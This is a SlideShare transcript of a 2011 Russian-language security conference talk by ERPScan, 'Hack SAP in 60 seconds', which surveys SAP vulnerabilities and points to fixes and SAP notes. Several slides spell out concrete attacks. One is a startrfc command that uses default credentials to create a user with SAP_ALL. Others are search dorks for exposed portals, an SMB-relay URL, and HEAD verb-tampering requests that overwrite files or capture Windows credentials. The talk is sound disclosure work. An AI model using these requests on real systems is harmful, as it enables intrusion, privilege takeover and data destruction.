Your SlideShare is downloading. ×
0
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Sap risspa
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Sap risspa

1,711

Published on

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
1,711
On Slideshare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
27
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Invest in securityto secure investmentsВзломать SAP за 60 cекундАлександр ПоляковТехнический Директор, Digital Securityat RiSSPA
  • 2. яerpscan.com ERPScan — invest in security to secure investments 2
  • 3. Доклады о безопасности SAP • Всего более 40erpscan.com ERPScan — invest in security to secure investments 3
  • 4. Количество SAP notes за год • Всего более 1500 на сентябрь 2011гerpscan.com ERPScan — invest in security to secure investments 4
  • 5. Публичная информация об уязвимостях • Всего более 150erpscan.com ERPScan — invest in security to secure investments 5
  • 6. SAP не дремлет Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасеerpscan.com ERPScan — invest in security to secure investments 6
  • 7. Поговорим о безопасности • Что мы знаем о SAP? • Проблемы ответственности и контроля • Примеры обхода SOD • Уязвимости ABAP движка из интернет • Уязвимости J2EE движка из интернет • Взломать SAP за 60 секунд демоerpscan.com ERPScan — invest in security to secure investments 7
  • 8. Что мы знаем о SAP Shut up And Pay Вставьте рисунок на слайд, скруглите верхний левый и нижний правый угол (Формат – Формат рисунка), добавьте контур (оранжевый, толщина – 3)erpscan.com ERPScan — invest in security to secure investments 8
  • 9. SAP? Who cares?erpscan.com ERPScan — invest in security to secure investments 9
  • 10. Постоянные новые угрозы • Тема атак на SAP стала • Администраторы не достаточно “модной” в security community осведомлены • Публикуется множество • Понимание безопасности уязвимостей только на уровне матрицы SOD • Ежегодно появляются угрозы • Системы усложняются Что делать?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 10
  • 11. Как атакуют? 2007 – Архитектурные уязвимости RFC 2008 – Атаки на рабочие станции SAP 2009 – Бэкдоры для SAP, атаки на SAPRouter 2010 – Атаки на WEB-приложения SAP 2010 – Stuxnet под SAP 2011 – Архитектурные и программные уязвимости в ERP Что дальше?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 11
  • 12. Последний год 2011 – Атаки на JAVA движок SAP 2011 – SQL инъекции в ABAP 2011 – Переполнение буффера в ABAP 2011 – Атаки Session Fixation в SAP 2011 – Атаки на SAPGUI 2011 – Спуфинг и перехват DIAG протокола Что дальше?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 12
  • 13. Угрозы для бизнеса Шпионаж • Кража финансовой информации • Кража персональных секретов • Списки поставщиков и контрагентов Саботаж • Отказ в обслуживании • Модификация финансовой отчетности • Нарушение работоспособности доверенных систем (SCADA) Мошенничество • Подмена данных о платежах • Ложные транзакцииerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 13
  • 14. Как защищаемся?Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение: Программы класса GRCУровень осведомлённости о проблеме - ВысокийБезопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение: Сканирование/Мониторинг/Тестирование на проникновениеУровень осведомлённости о проблеме - НизкийБезопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение: программный или ручной аудит кодаУровень осведомлённости о проблеме - Низкийerpscan.com ERPScan — Leading SAP AG partner in discovering and solving security vulnerabilities 14
  • 15. Что происходит сейчас Ок, вы потратили XXX млн. $ на лицензию SAP GRC + XXXX млн $ на консультантов, оптимизацию SOD и привели красивый отчёт для руководства, что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000. И в следующем году планируется уменьшить до 1000 А как обстоят дела с настройками безопасности платформы?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 15
  • 16. Как проконтролировать безопасность столь сложной системы ?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 16
  • 17. 1001 Способ обойти SOD • Не диалоговые пользователи • Прямой доступ к таблицам • Безопасность сервисов типа Gateway и Massage Server и прочих • Хитрые настройки • Доступ из интернет • Уязвимостиerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 17
  • 18. Не диалоговые пользователи Миф: Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации Есть множество RFC функций для создания пользователя: Пример1 SUSR_RFC_USER_INTERFACE startrfc -3 -h 172.16.0.63 -s 01 -c 001 -u SAPCPIC -p admin –F SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES,12,r=SAP_ALL Пример2 BAPI_USER_CREATE1erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 18
  • 19. Атаки на Gateway и Message Server • Атаки описаны в руководстве по безопасности SAP • Позволяют: – неавторизированно зарегистрировать ложный сервер приложений – вызвать зарегистрированный RFC сервис типа SAPXPG – зарегистрировать свой RFC сервис • Есть настройки, позволяющие элементарно закрыть уязвимости Если это так просто и очевидно, почему в 90% аудитов настроено не безопасно?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 19
  • 20. Хитрые настройки Администратор выставил следующие настройки: login/min_password_uppercase = 2 login/min_password_lng = 8 login/min_password_specials = 2 login/password_compliance_to_current_policy = 0 login/password_max_idle_productive =90 login/password_max_idle_initial = 90 В чём проблема?erpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 20
  • 21. Прямой доступ к таблицам • Чтение таблиц – через транзакции: SE16, SM31, SM30, SA38, SE38 – через RFC вызовы: RFC_READ_TABLE • Критичные таблицы: USR02 — хеши паролей SSF_PSE_D — ключи для SSO доступа RFCDES – пароли в открытом и зашифрованном виде ICFSERVLOC - пароли для ICF сервисов в открытом виде и ещё немного пока под секретомerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 21
  • 22. Доступ из интернет + уязвимостиerpscan.com ERPScan — invest in security to secure investments 22
  • 23. Атаки на ICM (ABAP) Более 1500 сервисов с критичным функционалом 1) По умолчанию разрешён доступ любым пользователем 2) Для доступа к /sap/bc/soap/rfc не проверяется авторизация S_RFC 3) Используя пароли по умолчанию типа TMSADM/PASSWORD Как итог - полный контроль системы злоумышленникомerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 23
  • 24. Прочие небезопасные сервисы • /sap/public/info — информация о системе анонимно • /sap/public/icf_info/icr_groups — информация о приложениях • /sap/bc/soap/rfc — выполнение RFC команд удаленно, DOS • /sap/bc/srt/xip/sap — выполнение критичных действий • /sap/bw/Bex — просмотр критичных инфообъектов • /sap/bc/bsp/sap/htmlb_samples — тестовый сервис • /sap/bc/gui/sap/its/webgui — SAPGUI через WEB Нами изучено более 50 небезопасных сервисовerpscan.ru ERPScan — инвестируйте в безопасность для защиты ваших инвестиций 24
  • 25. Атаки на J2EE Engine NetWeaver J2EE = интеграция, управление, взаимодействие • SAP Portal • SAP PI • SAP XI • SAP Mobile Infrastructure • SAP Solution Managererpscan.com ERPScan — invest in security to secure investments 25
  • 26. J2EE Platform Architectureerpscan.com ERPScan — invest in security to secure investments 26
  • 27. Удалённый доступ Service Name Port Number Default Value Range (min-max) HTTP 5NN00 50000 50000-59900 HTTP over SSL 5NN01 50001 50001-59901 IIOP 5NN07 50007 50007-59907 IIOP Initial Context 5NN02 50002 50002-59902 IIOP over SSL 5NN03 50003 50003-59903 P4 5NN04 50004 50004-59904 P4 over HTTP 5NN05 50005 50005-59905 P4 over SSL 5NN06 50006 50006-59906 Telnet 5NN08 50008 50008-59908 LogViewer control 5NN09 50009 50009-59909 JMS 5NN10 50010 50010-59910 По умолчанию шифрование на всех портах отключеноerpscan.com ERPScan — invest in security to secure investments 27
  • 28. Уязвимый алгоритм шифрования паролей в P4 • P4 - протокол, используемый утилитой Visual Admin • Все данные передаются в открытом виде • К сожалению (счастью), пароль закодирован Как он закодирован?erpscan.com ERPScan — invest in security to secure investments 28
  • 29. Уязвимый алгоритм шифрования паролей в P4erpscan.com ERPScan — invest in security to secure investments 29
  • 30. Уязвимый алгоритм шифрования паролей в P4 Удиви меняerpscan.com ERPScan — invest in security to secure investments 30
  • 31. Уязвимый алгоритм шифрования паролей в P4 /* 87 */ char mask = 43690; /* 88 */ char check = 21845; /* 89 */ char[] result = new char[data.length + 1]; /* */ /* 91 */ for (int i = 0; i < data.length; ++i) { /* 92 */ mask = (char)(mask ^ data[i]); /* 93 */ result[i] = mask; /* */ } /* 95 */ result[data.length] = (char)(mask ^ check); /* */ /* 97 */ return result;erpscan.com ERPScan — invest in security to secure investments 31
  • 32. Защита • Используйте SSL для шифрования всех соединений между SAP системами. http://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940 cbf2195de10000000a1550b0/content.htmerpscan.com ERPScan — invest in security to secure investments 32
  • 33. Взлом из интернет SAP системы доступны только из внутренней сети, о да, в самом деле? inurl:/irj/portal inurl:/IciEventService sap inurl:/IciEventService/IciEventConf inurl:/wsnavigator/jsps/test.jsp inurl:/irj/go/km/docs/erpscan.com ERPScan — invest in security to secure investments 33
  • 34. Из чего состоит J2EE Engine SAP NetWeaver 6.4 300 web –приложенийerpscan.com ERPScan — invest in security to secure investments 34
  • 35. Из чего состоит J2EE Engine SAP NetWeaver 7.0 500 web –приложенийerpscan.com ERPScan — invest in security to secure investments 35
  • 36. Из чего состоит J2EE Engine SAP NetWeaver 7.1 800 web –приложенийerpscan.com ERPScan — invest in security to secure investments 36
  • 37. Из чего состоит J2EE Engine SAP NetWeaver 7.2 1200 web –приложений, и это только в TRIALerpscan.com ERPScan — invest in security to secure investments 37
  • 38. Раскрытие информации • Версия системы DSECRG-11-023,DSECRG-11-027, DSECRG-00208 • Логи и трейсы DSECRG-00191,DSECRG-00232 • Имена пользователей DSECRG-11-034 New • Сканирование внутренней сети через внешний уязвимый сервер DSECRG-11-032 DSECRG-00175 Newerpscan.com ERPScan — invest in security to secure investments 38
  • 39. Раскрытие информации DSECRG-11-023erpscan.com ERPScan — invest in security to secure investments 39
  • 40. Раскрытие информации DSECRG-11-027erpscan.com ERPScan — invest in security to secure investments 40
  • 41. Раскрытие информации DSECRG-11-032 Host is not alive HTTP port Port closed SAP porterpscan.com ERPScan — invest in security to secure investments 41
  • 42. Раскрытие информации DSECRG-00231erpscan.com ERPScan — invest in security to secure investments 42
  • 43. Защита • SAP notes: 1548548,1545883,1503856,948851, 1545883 • Удаление ненужных и не поддерживаемых приложенийerpscan.com ERPScan — invest in security to secure investments 43
  • 44. Межсайтовый скриптинг 15.09.2011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability 19.08.2011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS 19.07.2011 [DSECRG-11-028] SAP NetWeaver ISpeak – XSS 20.06.2011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS 20.06.2011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS 12.04.2011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS 12.04.2011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS 14.03.2011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS 14.03.2011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS 14.03.2011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS 14.03.2011 [DSECRG-11-010] SAP NetWeaver logon.html - XSS 14.03.2011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS 14.12.2010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS 14.12.2010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS 14.12.2010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS 14.12.2010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS 11.11.2010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS И это только те, что закрыты !erpscan.com ERPScan — invest in security to secure investments 44
  • 45. SMBRelay http://server:port/mmr/MMR?filename=smbsnifferanyfileerpscan.com ERPScan — invest in security to secure investments 45
  • 46. CSRF + SmbRelay = CSSR http://server:port/mmr/MMR?filename=smbsnifferanyfile Заставь нажать на эту ссылку того, у кого есть к ней доступerpscan.com ERPScan — invest in security to secure investments 46
  • 47. Защита от CSRF Встроенное API для защиты от CSRF • Standard XSRF Protection. Вся работа реализуется сервером приложений (простые GET/POST) • Custom CSRF Protection. Обработка CSRF токенов на разработчике Есть множество мест, где эта защита не реализованаerpscan.com ERPScan — invest in security to secure investments 47
  • 48. SPMLerpscan.com ERPScan — invest in security to secure investments 48
  • 49. Аутентификация Declarative Programmatic Используя WEB.XML Используя UME Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmaticerpscan.com ERPScan — invest in security to secure investments 49
  • 50. Декларативная аутентификация <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping> <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>erpscan.com ERPScan — invest in security to secure investments 50
  • 51. Обход аутентификации Invoker Servlet• Можно вызвать любой сервлет напрямую по имени класса• Пример вызова - /servlet/com.sap.admin.Critical.Action• Порядка 30 приложений из 150 уязвимо (SAP ECC 6)erpscan.com ERPScan — invest in security to secure investments 51
  • 52. Защита• Параметр “EnableInvokerServletGlobally” установить в “false”• Для включения опции только для конкретных приложений - note 1445998• Для SAP NetWeaver Portal – note 1467771• Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan web.xml scanner manually.erpscan.com ERPScan — invest in security to secure investments 52
  • 53. Массовый взлом • I have a dream …….erpscan.com ERPScan — invest in security to secure investments 53
  • 54. Уязвимость Verb Tampering <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource- name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> А что если попробовать HEAD вместо GET?erpscan.com ERPScan — invest in security to secure investments 54
  • 55. Отказ в обслуживании Приложение Integration Directory HEAD /dir/support/CheckService?cmd_check&fileNameL=DEFAULT1.PFL& directoryNameL=D:usrsapDM0SYSprofile HTTP/1.0 Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети интернетerpscan.com ERPScan — invest in security to secure investments 55
  • 56. Получение доступа к ОС Приложение Integration Directory HEAD /dir/support/CheckService?cmd_check&fileNameL=DEFAULT1.PFL& directoryNameL= smbsniffersniff HTTP/1.0 Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под управлением Windows.erpscan.com ERPScan — invest in security to secure investments 56
  • 57. Полный контроль • Обнаружили секретный интерфейс для управления JAVA движком – Удалённое администрирование пользователей – Доступ к ОС – Выполнение произвольных команд – Выключение сервера • Установлен по умолчанию • Уязвим к Verb Tampering • Атака возможна без аутентификации из Интернет!erpscan.com ERPScan — invest in security to secure investments 57
  • 58. Взломать SAP за 60 секунд ДЕМООООООООООООО!!!!!!!!!!!!!!erpscan.com ERPScan — invest in security to secure investments 58
  • 59. Победаerpscan.com ERPScan — invest in security to secure investments 59
  • 60. Защита • SAP note 1503579, 1616259 • ERPScan WEB.XML check tool • Отключение ненужных сервисовerpscan.com ERPScan — invest in security to secure investments 60
  • 61. Итоги Проблема ответственности и контроляerpscan.com ERPScan — invest in security to secure investments 61
  • 62. Будущая работа Конференции: • 11 October - HITB в Кула-Лумпуре (Малайзия) • 25 October - HackerHalted в Miami (США) • 25 November – ZeroNights в Санкт-Петербурге (Россия) Новости: • dsecrg.ru • erpscan.ru Cпасибо: • Дмитрий Частухин, Дмитрий Евдокимов, Алексей Cинцов, Алексей Тюрин, Павел Кузьмин, Антон Спирин. • Организаторам Risspa Опрос: • Тренинг по безопасности SAPerpscan.com ERPScan — invest in security to secure investments 62
  • 63. ZeroNights — международная конференция, посвященная техническим аспектаминформационной безопасности. На конференции выступят известные экспертыотрасли из России, Европы, США, Индии, Сингапура и других стран. Главная цельконференции — распространение информации о новых методах атак, угроз изащиты от них, а кроме того, создание площадки для общения специалистов-практиков по ИБ.

×